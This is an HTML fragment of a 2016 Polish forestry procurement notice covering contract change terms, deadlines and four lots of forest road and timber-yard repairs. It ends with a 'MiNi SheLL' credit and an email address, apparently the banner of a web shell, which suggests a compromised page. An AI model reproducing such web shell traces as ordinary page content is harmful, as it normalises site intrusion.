<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki istotnych zmian umowy w stosunku do treści oferty. 
1.  Zmiana terminu wykonania umowy
Zamawiający przewiduje możliwość zmiany terminu realizacji przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany, jeżeli wystąpią następujące czynniki uniemożliwiające realizację przedmiotu zamówienia w terminie:
a)	w przypadku przedłużenia procedury udzielenia przedmiotowego zamówienia publicznego (wynikające z obiektywnych przyczyn i podyktowanych przepisami Ustawy), w wyniku którego umowa zostanie zawarta po dniu 30.05.2016 r.,
b)	udzielenia zamówień dodatkowych, uzupełniających, których wykonanie wpływa na zmianę terminu wykonania zamówienia podstawowego,
c)	wystąpienia siły wyższej, której wystąpienie ma wpływ na realizację umowy lub wystąpienie okoliczności zaistniałych w trakcie realizacji przedmiotu umowy utrudniających lub uniemożliwiających terminowe wykonanie przedmiotu umowy. Poprzez okoliczności uzasadniające zmianę terminu umowy rozumie się: osunięcia gruntów, długotrwałe intensywne opady, powódź, kolizje transportowe lub komunikacyjne, odkrycia w gruncie przedmiotów niemożliwych wcześniej do zidentyfikowania takich jak: głazy narzutowe, niewybuchy, przedmioty wymagające ochrony Konserwatora Zabytków i inne podobne nieprzewidywalne zdarzenia poza kontrolą którejkolwiek ze Stron i którym żadna ze Stron nie mogła zapobiec. W szczególności Zamawiający przewiduje możliwość przedłużenia terminu realizacji zamówienia w przypadku wystąpienia w okresie jego realizacji długotrwałych i intensywnych odpadów atmosferycznych jeżeli uniemożliwi to jego realizację.
d)	czasowego wstrzymania realizacji prac przez Zamawiającego z przyczyn wynikających z działań Zamawiającego, których nie można było przewidzieć pomimo zachowania należytej staranności,
e)	konieczności wprowadzenia zmian w sposobie wykonania robót budowlanych spowodowanych zmianami w przepisach prawa, norm i standardów lub zmianami w wiedzy technicznej oraz w przypadku stwierdzenia niezinwentaryzowanych elementów infrastruktury, działań organów administracji publicznej, bądź działań osób trzecich wymagających wprowadzenia zmian w dokumentacji projektowej, specyfikacjach technicznych, które wymuszą przerwanie prac lub zmianę uzyskanych pozwoleń.
W przypadku zaistnienia jednej z powyższych okoliczności dopuszcza się możliwość przedłużenia terminu zakończenia robót określonego w ofercie. Przedłużenie terminu zakończenia robót nastąpi w formie aneksu do umowy i wymaga pisemnego wniosku Wykonawcy wraz z uzasadnieniem, zaakceptowanego przez Zamawiającego. Przedłużenie terminu zakończenia prac nastąpi o okres niezbędny dla zakończenia robót uwzględniający okres wystąpienia czynników uniemożliwiających terminowe wykonanie przedmiotu umowy.
2. Zmiana zakresu przedmiotu umowy w sprawie niniejszego zamówienia lub sposobu wykonywania przedmiotu umowy, wraz ze skutkami wprowadzenia tej zmiany  przy czym zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy (zaistnienie warunków wpływających na zakres lub sposób wykonywania przedmiotu umowy):
a)	wydanie przez właściwy organ decyzji administracyjnej wyłączającej lub ograniczającej przedmiot zamówienia opisany w specyfikacji istotnych warunków zamówienia.
b)	ograniczenie przedmiotu zamówienia przez Zamawiającego wynikające z obiektywnych i uzasadnionych przyczyn, np. brak możliwości zrealizowania zakładanych robót budowlanych lub niewspółmiernie wysokie koszty osiągnięcia zamierzonego celu w stosunku do planowanych.
W przypadku zmian zakresu umowy ustala się  zmianę wynagrodzenia Wykonawcy  (obniżenia) w stopniu proporcjonalnym do zmiany zakresu przedmiotu umowy.
3.  Zmiana wynagrodzenia umownego
 Zamawiający ustala zmianę wynagrodzenia umownego w przypadku ustawowej zmiany stawki podatku od towarów i usług VAT. W przypadku zmiany stawki podatku VAT, cena netto za wykonanie przedmiotu umowy (części umowy) nie ulega zmianie, a wartość wynagrodzenia zostanie obliczona w oparciu o stawkę podatku VAT obowiązującą na dzień powstania obowiązku podatkowego. Nie dotyczy to przypadku objęcia obowiązkiem podatkowym Wykonawcy, który w dniu podpisania umowy nie był płatnikiem VAT. Takie zmiany nie wymagają aneksu do umowy.
Uwaga: W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. 
4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody.  
Nie stanowi zmiany umowy w rozumieniu art. 144 Ustawy:
a) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy,
b) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_bircza/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Bircza, adres: Stara Bircza 99, 37-740 Bircza.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2016 godzina 12:00, miejsce: Nadleśnictwo Bircza (sekretariat), adres: Stara Bircza 99, 37-740 Bircza.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Naprawa zjazdów ze szlaków zrywkowych i na skład drewna oraz naprawa szlaku zrywkowego w leśnictwie Turnica, Łodzinka, Kuźmina i Trzcianiec.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 1: Naprawa zjazdów ze szlaków zrywkowych i na skład drewna oraz naprawa szlaku zrywkowego w leśnictwie Turnica, Łodzinka, Kuźmina i Trzcianiec
Zadanie I: Naprawa szlaku zrywkowego w leśnictwie Trzcianiec oddz. 229
1. Wykonanie wykopów spycharką.
2. Wykonanie nasypu spycharką. 
3. Przemieszczenie urobku do wbudowania. 
4. Wykonanie sączka z drewna odpadowego - leżaniny.
5. Profilowanie powierzchni szlaku spycharką.
6. Karczowanie pni drzew.
7. Odkrzaczenie powierzchni szlaku
8. Uporządkowanie terenu robót
 Zadanie II: Naprawa zjazdów ze szlaków zrywkowych i na skład drewna w leśnictwie Kuźmina oddz. 268b
1. Rozebranie istniejącej nawierzchni z płyt drogowych.
2. Wykonanie koryta pod nawierzchnię z płyt.
3. Wykonanie koryta pod wodościek.
4. Profilowanie i zagęszczenie podłoża.
5. Ułożenie wodościeków na podbudowie z betonu. 
6. Ułożenie nawierzchni z płyt drogowych. 
7. Wykonanie utwardzenia pobocza.
8. Profilowanie i zagęszczenie powierzchni składu.
9. Wykonanie rowów odpływowych.
10. Przemieszczenie urobku z wykopów i humusu poza obręb prac oraz rozplantowanie.
11. Uporządkowanie terenu robót.
Zadania III: Naprawa zjazdów ze szlaków zrywkowych w leśnictwie Łodzinka oddz. 165n
1. Wykonanie koryta pod nawierzchnię- 171 m2
2. Profilowanie i zagęszczenie podłoża -171 m2
3. Wykonanie warstwy odcinającej z pospółki - 171 m2
4. Ułożenie nawierzchni z płyt drogowych - 171 m2
5.  Odmulenie rowów przydrożnych - 18 m3
6.  Rozebranie nawierzchni z płyt drogowych - 27 m2
7. Uporządkowanie terenu robót
Zadanie IV: Naprawa zjazdów ze szlaków zrywkowych w leśnictwie Turnica oddz. 141a
1. Wykonanie koryta pod nawierzchnię- 132m2
2. Profilowanie i zagęszczenie podłoża -132 m2 
3. Wykonanie warstwy odcinającej z pospółki - 132 m2
4. Ułożenie płyt drogowych - 132 m2 
6. Profilowanie powierzchni składu - 1200 m2
7. Karczowanie pni - 8 szt.
8. Uporządkowanie terenu robót
Szczegółowy opis zamówienia zawiera dokumentacja projektowa stanowiąca załącznik 1a do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 77.20.00.00-2, 45.11.27.00-2, 45.23.32.50-6, 45.11.22.10-0, 14.21.00.00-6, 44.16.31.00-1, 44.17.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Naprawa zjazdów ze szlaków zrywkowych w leśnictwie Arłamów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie I: Naprawa zjazdów ze szlaków zrywkowych w Leśnictwie Arłamów oddział 138a
1. Wykonanie koryta pod nawierzchnię- 159 m2
2. Profilowanie i zagęszczenie podłoża -159 m2 
3. Wykonanie warstwy odcinającej z pospółki - 159 m2
4. Ułożenie płyt drogowych - 159 m2 
6. Profilowanie powierzchni składu - 1200 m2
7. Karczowanie pni - 18 szt.
8. Uporządkowanie terenu robót.
Zadanie II: Naprawa zjazdów ze szlaków zrywkowych w Leśnictwie Arłamów oddział 153b
1. Wykonanie koryta pod nawierzchnię- 150 m2
2. Profilowanie i zagęszczenie podłoża -150 m2 
3. Wykonanie warstwy odcinającej z pospółki - 150 m2
4. Ułożenie płyt drogowych - 150 m2 
6. Profilowanie powierzchni składu - 1200 m2
7. Karczowanie pni - 29 szt.
8.  Formowanie i zagęszczanie nasypów - 450 m3
9.  Wykopy  z transportem materiału  - 770 m3
10.  Przedłużenie przepustu z rur O 50 cm  - 3 mb
11.  Wykonanie rowów odcinających - 44 m3
12.  Uporządkowanie terenu robót.
Szczegółowy opis zamówienia zawiera dokumentacja projektowa stanowiące załącznik 1b do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 77.20.00.00-2, 45.11.27.00-2, 45.23.32.50-6, 45.11.22.10-0, 14.21.00.00-6, 44.16.31.00-1, 44.17.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Naprawa zjazdów ze szlaków zrywkowych w leśnictwie Wojtkówka i Jureczkowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie I: Naprawa zjazdów ze szlaków zrywkowych w Leśnictwie Wojtkówka oddział 132a leśnictwie Jureczkowa oddz. 179a
1. Usunięcie warstwy humusu na gł. 15.0cm.
2. Wykonanie nasypu na istniejącym rowie pod nawierzchnię z płyt.
3. Dowiezienie gruntu do nasypów.
4. Profilowanie i zagęszczenie podłoża.
5. Ułożenie nawierzchni z płyt drogowych. 
6. Wykonanie utwardzenia pobocza.
7. Wykonanie rowu odpływowego.
8. Karczowanie pni.
9. Uporządkowanie terenu robót.
Zadanie II: Naprawa zjazdów ze szlaków zrywkowych w Leśnictwie Wojtkówka oddz. 73b
1. Wykonanie koryta pod nawierzchnię- 420 m2
2. Profilowanie i zagęszczenie podłoża -420 m2
3. Wykonanie warstwy odcinającej z pospółki - 420 m2
4. Ułożenie nawierzchni z płyt drogowych - 420 m2
5. Uporządkowanie terenu robót
Szczegółowy opis zamówienia zawiera dokumentacja projektowa stanowiące załącznik 1c do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 77.20.00.00-2, 45.11.27.00-2, 45.23.32.50-6, 45.11.22.10-0, 14.21.00.00-6, 44.16.31.00-1, 44.17.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Naprawa zjazdów ze szlaków zrywkowych w leśnictwie Jureczkowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie I: Naprawa zjazdów ze szlaków zrywkowych w leśnictwie Jureczkowa oddz. 172a
1. Wykonanie koryta pod nawierzchnię- 162 m2
2. Profilowanie i zagęszczenie podłoża -162 m2
3. Wykonanie warstwy odcinającej z pospółki - 162 m2
4. Ułożenie nawierzchni z płyt drogowych - 162 m2
5. Wykonanie ław fundamentowych pod przepusty - 1,20 m3
6. Ułożenie przepustu pod zjazdem - 6 m
7.  Rozebranie i wbudowanie ścianek czołowych przepustów - 1 szt.
8. Zasypanie przepustów kruszywem - 4,82 m3
9. Profilowanie i zagęszczanie powierzchni  składu - 1000 m2
10. Karczowanie pni drzew - 32 szt.
11. Uporządkowanie terenu robót.
Zadanie II: Naprawa zjazdów ze szlaków zrywkowych w Leśnictwie Jureczkowa oddz. 176b
1. Wykonanie koryta pod nawierzchnię- 162 m2
2. Profilowanie i zagęszczenie podłoża -162 m2
3. Wykonanie warstwy odcinającej z pospółki - 162 m2
4. Ułożenie nawierzchni z płyt drogowych - 162 m2
5. Wykonanie ław fundamentowych pod przepusty - 2,80 m3
6. Ułożenie przepustu pod zjazdem - 14 m
7.  Ścianki czołowe przepustu - 2 szt.
8. Zasypanie przepustów kruszywem - 11,25 m3
9. Profilowanie i zagęszczanie powierzchni  składu - 1000 m2
10. Karczowanie pni drzew - 35 szt.
11. Uporządkowanie terenu robót
Zadanie III: Naprawa zjazdów ze szlaków zrywkowych w Leśnictwie Jureczkowa oddz. 177b
1. Ułożenie nawierzchni z płyt drogowych - 9 m2
5. Wykonanie ław fundamentowych pod przepusty - 0,6 m3
6. Ułożenie przepustu pod zjazdem - 3 m
7.  Rozebranie i wbudowanie ścianki czołowej przepustu - 1 szt.
8. Zasypanie przepustów kruszywem - 2,40 m3
Szczegółowy opis zamówienia zawiera dokumentacja projektowa stanowiące załącznik 1d do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 77.20.00.00-2, 45.11.27.00-2, 45.23.32.50-6, 45.11.22.10-0, 14.21.00.00-6, 44.16.31.00-1, 44.17.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com